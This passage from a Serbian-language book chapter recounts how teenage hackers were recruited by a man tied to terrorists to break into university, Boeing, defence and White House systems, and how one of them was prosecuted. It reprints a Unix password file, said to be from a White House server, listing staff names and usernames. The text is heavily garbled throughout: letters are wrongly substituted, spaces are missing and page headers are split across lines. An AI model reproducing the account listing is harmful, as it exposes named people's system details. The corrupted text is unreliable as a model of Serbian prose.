Ispostavilo se da jezik nije nikakva prepreka za nekog kao ãto je ne0h.Poåeo je da boravi na IRC prezentacijama koje je koristila hakerskagrupa gLobaLheLL i preko te grupe se povezao sa studentom raåunar-skih nauka na kineskom univerzitetu. Povezao se s çim i zatraæio neko-liko korisniåkih imena i lozinki. Informacije za prijavàivaçe stigle suubrzo zatim, po sistemu haker hakeru, bez postavàaça pitaça. ne0h jeotkrio da je bezbednost raåunara na univerzitetu bila slaba do uæasna, ãtoje naroåito neobiåno za tehniåki univerzitet za koji bi se oåekivalo damoæe mnogo boàe. Veñina studenata imala je lozinke iste kao korisniåkaimena – istu reå ili frazu.
Kratka lista koju je student dostavio bila je dovoàna da ne0h dobijepristup kako bi mogao da poåne elektronsko “çuãkaçe”. Tako je otkriostudenta – zvañemo ga Åeng – koji je pristupao FTP prezentacijama(za preuzimaçe podataka) u SAD. Meœu tim FTP lokacijama, bila je i“warez” prezentacija – mesto za preuzimaçe piratskog softvera. Koristeñistandardan trik laænog predstavàaça, ne0h je skitao po mreæi fakulteta iskupàao lokalni studentski æargon. To je bilo lakãe nego ãto se åini jer“oni uglavnom govore engleski”, kaæe ne0h. Sa Åengom se povezao pre-ko naloga koji je omoguñio da sve izgleda kao da mu ne0h ãaàe porukeiz laboratorije za raåunarske nauke na fakultetu.
“Ja sam iz Bloka 213”, elektronski je rekao Åengu, i direktno muzatraæio imena studenata i adrese e-poãte, kao ãto bi uradio svaki drugistudent zainteresovan za kontakt s kolegama. Poãto je veñina lozinkibila jednostavna, ulazak u studentske datoteke nije iziskivao previãemozgaça.
Vrlo brzo mogao je da isporuåi Kalidu podatke iz baze o otprilike stostudenata. “Dao sam mu to, a on je rekao: ’Imam sve ãto mi treba‘.” Ka-lid je bio zadovoàan. Oåigledno mu ta imena uopãte nisu trebala, samoje hteo da vidi moæe li ne0h zaista da pribavi informacije iz tako udaàe-nog izvora. “Otprilike tada je poåela naãa veza”, kaæe ne0h. “Mogao samda obavim posao, on je to znao, i poåeo je da mi daje druge zadatke.”
29
Poglavlje 2
: Kad
teroristi p
ozo
vu
Rekavãi da ñe mu ugovorenih hiàadu dolara poslati poãtom, Kalid jepoåeo da zivka mobilnim otprilike jednom nedeàno, kako kaæe ne0h,“obiåno dok je vozio”. Sledeñi zadatak bio je upad u raåunarski sistemindijskog Centra za istraæivaçe atomske energije (Bhabha Atomic Re-search Center). Centar je koristio radnu stanicu Sun koja je poznatasvim hakerima. ne0h je lako uãao u çu, ali je otkrio da maãina ne sadræinikakve zanimàive informacije i da je samostalna – nije povezana ni sajednom mreæom. Kalid nije delovao zabrinuto zbog neuspeha.
U meœuvremenu, novac za upad u kineski univerzitet nije stigao.Kada je ne0h pitao za çega, Kalid se iznervirao. “Nisi ga dobio? Poslaosam ti keã u roœendanskoj åestitki!”, tvrdio je. Bila je to otrcana fraza:“Poslali smo åek poãtom”, ali je ne0h ipak rado nastavio da prihvatazadatke. Zaãto? Danas odgovor na to traæi introspekcijom.
Nastavio sam jer sam tvrdoglav. Uzbuœivala me je pomisao dañu biti plañen za to ãto radim. I mislio sam: “Moæda se novacstvarno usput zaturio, moæda ñe mi ovaj put platiti.”
Ne znam zaãto sam nastavio s tim. Zbog opsesivne prirode?Æeœi za novcem? Æudçe za moñi? Mogao bih nabrojati mnogorazloga.
U isto vreme dok je dodeàivao zadatke da ih ne0h reãava, Kalid jekrstario IRC prezentacijama traæeñi druge zainteresovane igraåe. Com-rade je bio zainteresovan, mada je bio oprezan kada je trebalo prihvatitinovac.
Koliko sam shvatio, on je plañao àudima, ali ja nikada nisamhteo da mu dam svoje podatke kako bih primio novac. Pomi-slio sam – to ãto ja radim samo je razgledaçe, ali ako poånemda primam pare, postañu pravi kriminalac. S çim sam uglav-nom razgovarao preko IRC-a i s vremena na vreme mu doba-civao poneku datoteku sa IP adresama sistema.
Novinar Nil Makaj razgovarao je s joã jednom ribom koju je Kalidupecao u svoju mreæu – tinejdæerom iz Kalifornije åija je identifikacijabila Kameleon (Chameleon), i koji je danas suosnivaå uspeãne kompani-je za bezbednost. Priåa koju je Makaj objavio na prezentaciji wired.com
1
,poklapala se sa detaàima koje su ispriåali ne0h i Comrade. “Jedne noñisam bio na IRC-u kada je taj tip rekao da mu treba DEM softver. Ja ga
30
Um
eñe
pro
vale
nisam imao i samo sam se izmotavao s çim”, tvrdio je haker. Kalid se uto vreme veñ uozbiàio: “DEM” je skrañenica za Defense Information Sy-stems Network Equipment Manager – softver za mreæe koji je koristilavojska. Program je skinula grupa hakera Masters of Downloading, ikruæile su glasine da do çega moæete doñi ako ga zatraæite od prave oso-be. Niko ne zna da li se Kalid ikada doåepao tog programa – ili bar nikoneñe da prizna. Zapravo, nije potpuno sigurno ni da bi mu taj softver iãtavredeo – ali on je oåigledno mislio da bi. Kalid je zavrãio svoje igre s ki-neskim univerzitetima i sliånim sitnim poslovima.
“Pokuãao je da se ukàuåi u ono ãto su momci u grupi radili”, priåaonam je ne0h. Kalid se javàao hakerima tokom godinu i po dana: “Nijebio neko ko bi se sporadiåno pojavàivao, javàao se redovno. Bio je tu isvi su znali da je to çegova stvar”. Kada kaæe “çegova stvar”, ne0h mi-sli na upadaçe u vojne prezentacije ili raåunarske sisteme komercijal-nih kompanija koje rade na vojnim projektima.
Kalid je traæio da ne0h upadne u Lockheed Martin i nabavi ãemeodreœenih avionskih sistema koji su se u toj kompaniji pravili za Boing.ne0h je uspeo da delimiåno prodre u Lockheed, “oko tri koraka u unu-traãçu mreæu”, ali nije uspeo da ode dubàe od dva servera (doãao je donivoa koji àudi iz bezbednosti nazivaju “demilitarizovana zona” ili“DMZ” – niåija zemàa). To nije bilo dovoàno da proœe barijere koje suãtitile najosetàivije korporacijske podatke, i nije mogao da pronaœe za-htevane informacije.
[Kalid] se razdraæio. Otprilike je rekao: “Viãe ne radiã za me-ne. Ne moæeã niãta da obaviã”. Ali onda me je optuæio da samzadræao informacije za sebe.
Potom je rekao: “Zaboravi Lockheed Martin. Idi direktno naBoing.”
ne0h je otkrio da Boing “nije toliko obezbeœen, ako se dovoànopotrudite”. On je upao iskoristivãi poznatu slabost Boingovog sistema –izloæenost Internetu. Poãto je instalirao “çuãkalo” (program za nadgle-daçe protoka podataka, engl.
sniffer
), mogao je da osluãkuje sve paketepodataka koji su ulazili u raåunar i izlazili iz çega – program je radiokao prisluãni ureœaj za raåunare. Tako je doãao do lozinki i neãifrovanihe-poruka. Informacije koje je skrpio iz e-poruka otkrile su dovoànopodataka za ulazak u internu mreæu.
31
Poglavlje 2
: Kad
teroristi p
ozo
vu
Pronaãao sam ãest ili sedam ãema za vrata i nos Boinga 747 –samo prolazeñi kroz tekstualne e-poruke. Ljudi su slali neãifro-vane priloge uz poruke. Zar to nije sjajno?! (Tu se zasmejao.)
Kalid je bio ushiñen. Rekao je da ñe mi dati 4.000 dolara. Tose, naravno, nikada nije desilo.
Zapravo, 4.000 dolara bi bilo previãe za te informacije. Sudeñi po biv-ãem direktoru bezbednosti Boinga, Donu Belingu, ovaj upad se moædazaista desio kao ãto je opisano. Meœutim, on bi bio åisto gubàeçe vre-mena: kada nov tip aviona uœe u eksploataciju, sve putniåke agencije do-bijaju kompletne skupove ãema. U tom trenutku, te informacije se viãene smatraju osetàivim. Moæe ih dobiti svako ko poæeli. “Nedavno samna lokaciji eBay video i CD sa ãemama za 747”, rekao je Don. Naravno,Kalid to verovatno nije znao. Proãlo je dve godine dok nacija nije otkrilada su neki teroristi imali jake razloge da æele ãeme glavnih putniåkihaviona koje koriste ameriåke avionske kompanije.
Veåeraãça meta: SIPRNET
Kalid se nije trudio da Comradeu daje probne zadatke. Od samog po-åetka, priåa ovaj haker, Kalida “su zanimali samo vojska i SIPRNET”.
On uglavnom nije konkretno govorio ãta hoñe – hteo je pristupvladinim i vojnim prezentacijama. Osim kada je u pitaçubio SIPRNET. Informacije sa SIPRNET-a je zaista æeleo.
Nije ni åudo ãto je Kalid æudeo za tim podacima. Oni su verovatnobili çegov cià od samog poåetka. SIPRNET je deo mreæe odbrambe-nog informacionog sistema, DISN-a (engl.
Defense Information SystemNetwork
), koji prenosi poveràive poruke. Ãtaviãe, SIPRNET (skrañeni-ca za Secret Internet Protocol Router Network) sada je sræ komando-vaça i kontrole u vojsci SAD.
ne0h je veñ odbio Kalidovu ponudu da prodre u SIPRNET:
Ponudio je 2.000 dolara. Odbio sam ga. Da sam uãao u SI-PRNET, federalci bi mi zaåas doãli na vrata. 2.000 dolaranije vredno rupe u glavi.
Kada je Kalid razgovarao s Comradeom o tom zadatku, cena je sko-åila. “Mislim da je rekao da ñe platiti deset hiàada dolara za pristup”,
32
Um
eñe
pro
vale
priseña se Comrade. To je bila dobra pogodba àudima koji se nisu sne-bivali da prihvate projekte. Ipak, on tvrdi da ga je u iskuãeçe bacio iza-zov, a ne novac.
U stvari, SIPRNET-u sam se dosta primakao. Uãao sam u je-dan raåunarski sistem u DISA (Defense Information SecurityAgency).Taj raåunar je bio izuzetno dobar. Mislim da je imaoåetiri procesora, oko 2.000 àudi je imalo pristup, Unixova da-toteka sa IP adresama imala je oko 5.000 razliåitih servera, apolovina je koristila privilegovane naloge. Morao si da budeãza tim raåunarom da bi mu pristupio – nisi to mogao da ura-diã spoàa.
Kako god da je to zakàuåio, Comrade je ispravno slutio da je nabasaona neãto bitno. Glavne misije DISA ukàuåuju zdruæenu komandu i kon-trolu, i raåunarsku podrãku jedinicama u borbi – mudro preklapaçe safunkcijama SIPRNET-a. Meœutim, çegovi napori su saseåeni.
Bilo je simpatiåno imati sve te pristupe, ali nisam imao dovoà-no vremena da se time poigram i uradim neãto. Ukebali su metri ili åetiri dana kasnije.
Vreme za zabrinutost
Na Boæiñ 1999, ne0h i Comrade su doæiveli ãok. Let IC-814 IndianAirlinesa, na pravcu Katmandu – Nju Delhi, sa 178 putnika i 11 ålano-va posade, otet je u toku leta. Reporteri su javili da su otimaåi bili paki-stanski teroristi povezani s Talibanima. Teroristi kao ãto je Kalid?
Pod komandom otmiåara, Airbus A300 nastavio je cik-cak putaçomdo Sredçeg Istoka i nazad, nakratko sletevãi u Indiji, Pakistanu i Ujedi-çenim Arapskim Emiratima, gde je izbaåeno telo zaklanog putnika. Bioje to mlad åovek koji se sa tek venåanom suprugom vrañao kuñi s mede-nog meseca. On je na smrt izboden jer je odbio da stavi povez na oåi.
Avion je konaåno sleteo u Kandahar u Avganistanu – ãto je dodatnoukazivalo na vezu s Talibanima. Preostali putnici i posada zadræani su uavionu tokom osam dana ispuçenih terorom, i na kraju su puãteni uzamenu za oslobaœaçe tri uhapãena militanta. Jedan od osloboœenihzatvorenika, Ãeik Umer, kasnije je pomogao u finansiraçu MohamedaAte, voœe napada na Svetski trgovinski centar 11. septembra.
33
Poglavlje 2
: Kad
teroristi p
ozo
vu
Nakon otmice, ne0h je saznao od Kalida da je çegova grupa odgo-vorna i da je i on sâm uåestvovao u otmici.
Na smrt sam se uplaãio. On je bio loã. Oseñao sam da moramda saåuvam æivu glavu.
Ali çegovu zabrinutost ublaæavala je deåaåka pohlepa. “I daàe samse nadao da ñe mi isplatiti moj novac”, dodao je ne0h.
Veza sa otmicom dolila je uàe na vatru koju je Kalid ranije zapalio.U jednom trenutku, oåigledno iznerviran neuspeãnim pokuãajima ti-nejdæera da mu pribave informacije koje je traæio, Kalid je pokuãao staktikom visokog pritiska. Novinar Nil Makaj, u ranije navedenoj priåiza wired.com, napisao je da je video staru poruku na IRC-u koju je Ka-lid poslao ovim mladiñima i u kojoj je pretio da ñe ih ubiti ako ga prija-ve Federalnom istraænom birou. Makaj je napisao da je video i sledeñuporuku od Pakistanca: “Hoñu da znam: da li je [iko] priåao federalcimao meni?” A na drugom mestu: “Reci im [ako to urade] da su mrtvi. Na-huãkañu snajperiste na çih.”
2
Comrade je uhapãen
Situacija je postala gusta, a uskoro ñe se i pogorãati. Nekoliko dana poãtoje Comrade uspeo da prodre u sistem povezan sa SIPRNET-om, çe-govog oca je na putu do posla zaustavila policija. Rekli su mu: “Hoñemoda razgovaramo s tvojim sinom”, i pokazali mu nalog za pretres. Comra-de se priseña:
Bilo je tu àudi iz NASA, Ministarstva odbrane, FBI-ja. Sve usvemu, bilo je oko deset ili dvanaest agenata, i nekoliko polica-jaca. Petàao sam po nekim Nasinim sanduåiñima, postaviosam “çuãkalo” na ns3.gtra.mil da bih pokupio lozinke. Ali,tako sam pokupio i e-poruke. Rekli su mi da sam zbog togaoptuæen za nelegalno prisluãkivaçe. A za Nasine raåunare do-bio sam krãeçe zaãtiñenih prava. I druge stvari.
Samo dan ranije, prijateà mi je rekao: “Åoveåe, uskoro ñe nasuhvatiti”. Odlepio je. Pomislio sam: “U pravu je”. Zato samobrisao svoj disk.
34
Um
eñe
pro
vale
Meœutim, Comrade nije bio temeàan pri åiãñeçu. “Zaboravio samstare diskove koji su mi stajali na stolu.”
Ispitivali su me. Priznao sam. Rekao sam: “Æao mi je. Evo ãtasam uradio, evo kako ñete popraviti, viãe to neñu raditi.” A onisu rekli, kao: “U redu, neñemo te tretirati kao kriminalca. Ne-moj to viãe da radiã. Ako to ponovo uradiã, ne ginu ti lisice.”Spakovali su moje raåunare, periferne ureœaje i rezervne di-skove, i otiãli.
Kasnije su pokuãali da nateraju Comradea da im kaæe lozinku za svo-je ãifrovane diskove. Kada je odbio, rekli su da znaju kako da ih provale.Comrade je mislio da ne mogu: koristio je PGP ãifrovaçe i lozinka muje bila “duga oko sto znakova”. Ipak, on tvrdi da nije bila teãka zapamñeçe – bila su to çegova tri omiàena citata spojena u niz.
Oko ãest meseci nije imao kontakta s policijom. A onda je jednogdana åuo da ñe vlada podneti tuæbu. Do trenutka kada je dospeo na sud,bio je optuæen za, kako je tuæilac tvrdio, tronedeàno iskàuåivaçe Nasi-nih raåunara i presretaçe hiàada poruka unutar Ministarstva odbrane.
(Kao ãto i sâm vrlo dobro znam, “ãteta” koju tuæioci navode i stvarnaãteta ponekad su veoma razliåite. Comrade je iz Nasinog centra MarshallSpace Flight u Alabami preuzeo softver koji se koristi za kontrolisaçetemperature i vlaænosti u meœunarodnoj svemirskoj stanici. Vlada je tvr-dila da je zbog toga morala da na tri nedeàe iskàuåi odreœene raåunarskesisteme. Napad na Ministarstvo odbrane pruæio je realistiåniji razlog zabrigu: Comrade je provalio u raåunarski sistem Odbrambene agencije zaublaæavaçe pretçi (engl.
Defense Threat Reduction Agency
) i instalirao“zadça vrata” koja su mu omoguñila pristup u bilo koje vreme.)
Vlada je oåigledno ovaj sluåaj smatrala bitnim za upozoravaçe osta-lih hakera tinejdæera. U medijima je suœeçu posveñena velika paæça iComrade je proglaãen najmlaœom osobom koja je ikada osuœena za ha-kerisaçe kao federalni zloåin. Glavni tuæilac Dæenet Rino je åak dala iz-javu u kojoj kaæe: “Ovaj sluåaj, u kom ñe prvi put maloletni hakersluæiti zatvorsku kaznu, pokazuje da ozbiàno shvatamo raåunarske upa-de i da sa svojim partnerima iz kriminalistiåke sluæbe radimo na agresiv-noj borbi protiv ovih pojava”.
35
Poglavlje 2
: Kad
teroristi p
ozo
vu
Sudija je Comradea osudio na ãest meseci zatvora i ãest meseci uslov-ne kazne, s poåetkom nakon zavrãetka polugodiãta. Comradeova majkaje tada joã bila æiva. Angaæovala je novog advokata, napisala mnogo pi-sama, sudiji je prikazala “potpuno nov sluåaj” i, za divno åudo, uspelada smaçi kaznu na kuñni pritvor i potom åetiri godine uslovne kazne.
Ponekad u æivotu ne koristimo ãanse koje nam se pruæaju. “Odsluæiosam kuñni pritvor i u toku je bila uslovna kazna. Razne stvari su se desile,poåeo sam previãe da se zabavàam, pa su me poslali na rehabilitaciju.”Kada je rehabilitacija proãla, Comrade se zaposlio u Internet kompaniji izapoåeo sopstveni posao sa Internetom. Meœutim, on i sluæbenik za us-lovnu kaznu nisu su previãe viœali, pa je Comrade na kraju ipak otiãao uzatvor. Imao je samo ãesnaest godina, a zatvoren je za dela koja je poåiniokada je imao petnaest.
U federalnom kaznenom sistemu nema tako mnogo maloletnika.Ispostavilo se da su ga poslali u “kamp” (prava reå za to mesto) u Alaba-mi, u kom je bilo samo deset zatvorenika. Comrade za kamp kaæe da je“viãe nalik ãkoli – zakàuåana vrata i ograda od bodàikave æice, ali inaåenije imalo mnogo veze sa zatvorom”. Åak nije morao da ide na åasovejer je veñ zavrãio sredçu ãkolu.
Kada se vratio u Majami i na sluæeçe uslovne kazne, Comrade je do-bio spisak hakera s kojima ne sme da razgovara. “Na listi je pisalo, ovajtip, onaj tip i – ne0h.” Samo “ne0h” – federalna vlada ga je znala samopo identifikaciji. “Nisu imali pojma ko je on. Ako sam ja imao pristupdo dve stotine stvari, on je imao pristup do hiàadu”, kaæe Comrade.“ne0h je bio priliåno veãt.” Koliko oni znaju, kriviåni organi joã uveknisu uspeli da otkriju çegovo ime ili lokaciju.
Ispitivaçe Kalida
Da li je Kalid bio militant kao ãto je tvrdio, ili samo prevarant koji jemanipulisao tinejdæerima? Ili je to moæda bila operacija Federalnog istra-ænog biroa kojom su isprobavali koliko daleko su mladi hakeri voàni daidu? Pre ili kasnije, svaki haker koji je imao posla s Kalidom posumçaoje da on nije zaista bio militantni aktivista. Åini se da ih je pomisao da suinformacije davali stranom agentu muåila maçe od moguñnosti da ih jetaj tip samo navukao. Comrade kaæe da se “najviãe pitao ãta je [Kalid]bio. Nisam znao da li je federalac ili je bio ono ãto je tvrdio. Na osnovu
36
Um
eñe
pro
vale
razgovora koji su vodili ne0h i Kalid, zakàuåio sam da ne laæe. Ali nikadaod çega nisam uzeo novac – to je bila granica koju nisam hteo dapreœem.” (Ranije u razgovoru, kada je prvi put pomenuo deset hiàadadolara koje je Kalid ponudio, Comrade je zvuåao impresioniran sumom.Da li bi odbio novac ukoliko bi çegovi pokuãaji bili uspeãni, a Kalid muzaista platio? Moæda ni sam Comrade ne zna da odgovori na to pitaçe.)
ne0h kaæe da je Kalid “zvuåao potpuno profesionalno” ali priznajeda se povremeno pitao je li ovaj zaista militantni aktivista. “Sve vremedok sam razgovarao s çim, mislio sam da previãe baàezga. Ali nakonistraæivaça s prijateàima koji su s çim razgovarali i kojima je davaodruge informacije, zakàuåili smo da je zaista bio ono ãto je tvrdio.”
Haker Savec0re je na IRC-u sreo nekoga ko je rekao da u FBI imastrica koji bi mogao da sredi imunitet za celu hakersku grupu Mil-w0rm. “Mislim da bismo time poslali poruku FBI-ju da nismo neprija-teàski nastrojeni”, Savec0re je rekao Makaju u intervjuu putem e-poãte.“Dao sam mu moj broj telefona. Sledeñeg dana me je pozvao navodniFBI agent sa zaåuœujuñe jakim pakistanskim akcentom.”
“Rekao je da se zove Majkl Gordon i da je radio za FBI u Vaãingto-nu”, Savec0re je ispriåao novinaru. “Shvatio sam da je to sve vreme bioIbrahim.” Mada su se neki àudi pitali da li je navodni terorista bio tajniagent Federalnog istraænog biroa, Savec0re je doãao do suprotnog za-kàuåka: da je tip koji je tvrdio da je FBI agent u stvari isti terorista koji jepokuãavao da vidi jesu li su momci spremni da propevaju o çemu.
Ideja da je to moæda bila operacija FBI-ja nema åvrste osnove. Uko-liko je federalna vlada htela da otkrije za ãta su ovi klinci sposobni i ko-liko daleko su spremni da idu, obeñani novac bi stigao. Kada FBIpomisli da je situacija dovoàno ozbiàna da zahteva angaæovaçe tajnogagenta, oni u taj trud ulaæu novac. Neverovatno bi bilo da su obeñali1000 dolara, a da to nisu platili.
Izgleda da je samo jedan haker zaista dobio novac od Kalida – Ka-meleon. “Jedno jutro sam otiãao do sanduåeta i u çemu je bio åek nahiàadu dolara s brojem koji treba da pozovem u Bostonu”, ispriåao jeKameleon u priåi za
Wired News
(4. novembra 1998). Kalid je saznaoda on ima mape vladine raåunarske mreæe – åek je bio uplata za temape. Kameleon je unovåio åek. Dve nedeàe kasnije FBI mu je upao ukuñu i ispitivao ga o isplati, ãto pokreñe zanimàivo pitaçe o tome kakoje vlada saznala za tih hiàadu dolara. To se desilo pre 11. septembra,
37
Poglavlje 2
: Kad
teroristi p
ozo
vu
dok se FBI fokusirao na domañi kriminal i slabo pratio teroristiåke pret-çe. Kameleon je priznao da je uzeo novac, ali je novinaru
Wired Newsa
tvrdio da nije dao nikakve mape vladine mreæe.Mada je Kameleon priznao da je uzeo novac od stranog teroriste, za
ãta bi mogao biti optuæen za ãpijunaæu i dobiti veoma dugu zatvorskukaznu, nikakva optuænica nije bila podignuta – ãto daàe produbàujemisteriju. Moæda je vlada samo htela da se po hakerskoj zajednici pro-åuje da saraœivaçe sa stranim agentima moæe biti riziåno. Moæda åek inije bio od Kalida, veñ od FBI-ja.
Samo nekoliko àudi zna Kameleonov pravi identitet, i on bi voleoda tako i ostane. Hteli smo da åujemo çegovu verziju priåe. Odbio jeda govori o tome (samo pomenuviãi kako je mislio da je Kalid u stvarifederalac koji se predstavàa kao terorista). Da sam na çegovom mestu,ni ja ne bih hteo da me intervjuiãu na tu temu.
Organizacija Harkat ul-Mudæahedin
Dok je pretraæivao dnevnike interaktivnih razgovora na Internetu, no-vinar Makaj je otkrio da se Kalid jednom prilikom predstavio mladimhakerima kao ålan organizacije Harkat-ul-Ansar
3
. Sudeñi po Pregleduobaveãtajne sluæbe Juæne Azije (South Asia Intelligence Review), “SADsu proglasile
Harkat-ul-Ansar
teroristiåkom organizacijom zbog çihoveveze s proteranim saudijskim teroristom Osamom Bin Ladenom 1997.Da bi se izbegle posledice ameriåke zabrane, grupa je 1998. promenilaime u
Harkat ul-Mudæahedin
.”
4
Ministarstvo inostranih poslova SAD iznova je upozoravalo na tugrupu. Jedna çihova objava kaæe: “Pakistanski zvaniånici su izjavili da suu ameriåkim vazduãnim napadima 23. oktobra [2001] ubijena 22 pa-kistanska gerilca koji su se borili uz Talibane u blizini Kabula. Poginulisu bili ålanovi organizacije Harkat ul-Mudæahedin... [koju] je Ministar-stvo inostranih poslova postavilo na zvaniånu listu teroristiåkih organi-zacija 1995.”
5
Zapravo, Harkat je danas jedna od trideset ãest grupa koje su u SADoznaåene kao strane teroristiåke organizacije. Ameriåka vlada ih, dru-gim reåima, smatra najgorim àudima na kugli zemaàskoj.
Naravno, mladi hakeri to nisu znali. Za çih je sve bila samo igra.Govoreñi u aprilu 2002. o bezbednosti informacija, general-major
indijskih vojnih snaga, potvrdio je da je Kalid terorista, ispriåavãi o
38
Um
eñe
pro
vale
hakerskim vezama sa “Kalidom Ibrahimom iz organizacije Harkat-ul-Ansar smeãtene u Pakistanu”.
6
General se, meœutim, pribojavao da Ka-lid nije u Pakistanu veñ u Delhiju, u Indiji.
Posledice 11. septembra
Neki hakeri manipuliãu i obmaçuju. Oni varaju raåunarske sistemenavodeñi ih da pomisle kako imaju ovlaãñeça koja su zapravo ukrali.Oni veæbaju laæno predstavàaçe da bi manipulisali àudima i postiglisvoje ciàeve. Sve to znaåi da, kada govorite s hakerom, morate sluãatipaæàivo i utvrditi da li ono ãto vam govori, i naåin na koji to govori,zvuåi uveràivo. Ponekad prosto neñete biti sigurni.
Koautor ove kçige i ja nismo bili sigurni u ono ãto nam je ne0h re-kao o svojoj reakciji na 11. septembar. Poverovali smo mu toliko da vamprenesemo çegovu izjavu.
Znate li koliko sam plakao tog dana? Bio sam siguran da je go-tovo s mojim æivotom.
Te reåi je propratio åudnim, nervoznim smehom – s kojim znaåe-çem? Nismo mogli da odredimo.
Pomisao da sam imao veze s tim. Da sam uãao u LockheedMartin ili Boing i doãao do joã informacija, mogli su da ih is-koriste. Bilo je to loãe vreme za mene i za Ameriku.
Plakao sam jer nikada nisam pomislio na to da ga prijavim.Nisam dobro rasuœivao. To je bio razlog zbog kog me je anga-æovao da uradim sve te stvari...
[Pomisao] da sam i malim prstom uåestvovao u onom ãto sedesilo s Trgovinskim centrom... u potpunosti me je skrhala.
U Svetskom trgovinskom centru stradala su tri moja druga.Nikada se nisam oseñao tako loãe.
Mnogi hakeri su tinejdæeri, pa åak i mlaœi. Da li je to prerano da bise prepoznala potencijalna opasnost ili reagovalo na zahteve nekoga kobi mogao predstavàati pretçu zemài? Mislim da su nakon 11. septem-bra ameriåki hakeri – åak i oni veoma mladi – postali sumçiåavi i da jemalo verovatno da ñe ih teroristi prevariti. Nadam se da sam u pravu.
39
Poglavlje 2
: Kad
teroristi p
ozo
vu
Upad u Belu kuñu
Istorija raåunarske bezbednosti u neku ruku ima sliånosti s davnomistorijom kriptografije. Vekovima su àudi smiãàali ãifre koje su oznaåa-vali kao “nemoguñe za otkrivaçe”. Åak i danas, u eri raåunara kojimogu brzo ãifrovati poruku pomoñu kàuåa za jednokratnu upotrebu, ilikàuåa koji sadræi stotine znakova, veñina kodova i daàe se moæe deãi-frovati. (Ameriåka organizacija za ãifrovaçe i deãifrovaçe, Agencija zanacionalnu bezbednost – engl.
National Security Agency
, razmeñe se bro-jem najveñih, najbræih i najmoñnijih raåunara na svetu.)
Bezbednost raåunara je kao stalna igra maåke i miãa u kojoj su struå-çaci za bezbednost na jednoj strani, a upadaåi na drugoj. Operativni si-stem Windows sadræi desetine miliona redova koda. Sasvim je jasno dasvaki ogroman softver mora da sadræi slabosti koje ñe posveñeni hakeripre ili kasnije otkriti.
U meœuvremenu, radnici u kompanijama, åinovnici, ponekad i profe-sionalci u oblasti bezbednosti, instalirañe nov raåunar ili program i za-boraviti da promene podrazumevanu ãifru, ili se neñe potruditi da smisleãifru koja je bar donekle sigurna – ostavàajuñi ureœaj u raçivom staçu.
Ako åitate vesti o hakerskim napadima i upadima, znate da su vojnei vladine prezentacije, åak i Web prezentacija Bele kuñe, veñ ugroæene.Ponekad neprestano.
Upad na prezentaciju i meçaçe Web strane je jedno – to je uglav-nom trivijalna, ili bar dosadna stvar. I pored toga, mnogi àudi se osla-çaju na samo jednu lozinku koju koriste svuda. Ukoliko provaàivaçeu Web prezentaciju vodi do hvataça lozinki, napadaå moæe dospeti usituaciju da ima pristup ostalim sistemima u mreæi i moæe da napravimnogo veñu ãtetu. ne0h kaæe da su 1999. godine on i joã dva ålana ha-kerske grupe gLobaLheLL uradili upravo to, na jednom od najosetài-vijih mesta u SAD-u – u Beloj kuñi.
Mislim da su u Beloj kuñi reinstalirali operativni sistem. Svesu vratili na podrazumevane vrednosti. I u tom periodu, u tra-jaçu od deset, petnaest minuta, Zyklon i MostFearD uspeli suda uœu, doœu do skrivene datoteke lozinki, provale je, uœu, ipromene Web prezentaciju. Bio sam tamo dok su to radili.
Trebalo je samo da budu na pravom mestu u pravo vreme.Desilo se sluåajno – bila je åista sreña da su se zadesili na vezibaã kada je neko radio na prezentaciji.
40
Um
eñe
pro
vale
O tome smo priåali u priåaonici grupe gLobaLheLL. Probudiome poziv oko 3 ujutro kojim su me obavestili ãta se deãava. Re-kao sam: “Baàezgaã. Dokaæi.” Skoåio sam za raåunar. I stvar-no, uradili su to.
MostFearD i Zyklon obavili su najveñi deo posla. Dali su miskrivenu datoteku da je provalim ãto bræe mogu. Doãao sam dojedne [lozinke] – bila je to obiåna reå iz reånika. I to je bilo to.
ne0h nam je dao deo koda za koji kaæe da je datoteka lozinke koju suostali nabavili i preneli mu. U çoj je naizgled nabrojano nekoliko ov-laãñenih korisnika, ålanova osobàa Bele kuñe
7
:
root:x:0:1:Super-User:/:/sbin/shdaemon:x:1:1::/:bin:x:2:2::/usr/bin:sys:x:3:3::/:adm:x:4:4:Admin:/var/adm:uucp:x:5:5:uucp Admin:/usr/lib/uucp:nuucp:x:9:9:uucpAdmin:/var/spool/uucppublic:/usr/lib/uucp/uucicolisten:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:6001:Nobody:/:noaccess:x:60002:60002:No Access User:/:nobody4:x:65534:65534:SunOS 4.x Nobody:/:bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/shorion:x:1002:10:ChristopherAdams:/usr/users/orion:/usr/ace/sdshellwebadm:x:1130:101:WebAdministrator:/usr/users/webadm:/bin/shcadams:x:1003:10:ChristopherAdams:/usr/users/cadams:/usr/ace/sdshellbartho_m:x:1004:101:MarkBartholomew:/usr/users/bartho_m:/usr/ace/sdshellmonty:x:1139:101:Monty Haymes:/usr/users/monty:/bin/shdebra:x:1148:101:Debra Reid:/usr/users/debra:/bin/shconnie:x:1149:101:ConnieColabatistto:/usr/users/connie:/bin/shbill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh
Ovo je vrsta Unixove ili Linuxove datoteke lozinki, kakva se koristiza skladiãteçe ãifrovanih lozinki u posebnoj, zaãtiñenoj datoteci. Svakired navodi ime jedne osobe koja ima nalog na sistemu. Unos “sdshell” u
41
Poglavlje 2
: Kad
teroristi p
ozo
vu
nekim redovima nagoveãtava da ti korisnici, zbog dodatne sigurnosti,imaju mali elektronski ureœaj nazvan “RSA SecureID”. On prikazujeãestocifreni broj koji se meça svakih ãezdeset sekundi. Da bi se prijavili,ti korisnici moraju da unesu ãestocifreni broj koji je u tom trenutku pri-kazan na çihovom ureœaju SecureID, i liåni identifikacioni broj, PIN(koji ponegde dodeàuje kompanija, a nekad ga bira sam korisnik). Webprezentaciji Bele kuñe promeçena je matiåna strana u isto vreme kadaje na çu provaàeno, kao dokaz da su hakeri bili tu, objasnio je ne0h.Dao nam je i vezu do upotrebàene strane (slika 2-1).
8
Pored simbolahakerske grupe gLobaLheLL, poruka sadræi i logotip Hong Kong Dan-ger Duo. To je, kaæe ne0h, laæno ime koje je izmiãàeno kako bi se dodaojoã jedan element za obmaçivaçe.
Koliko se ne0h seña, momci odgovorni za ovaj upad na prezentacijuBele kuñe nisu bili naroåito ushiñeni ãto su uspeli da upadnu na jednu
Slika 2-1: Strana kojom je zameçena Web prezentacija Bele kuñe, maj 1999.
42
Um
eñe
pro
vale
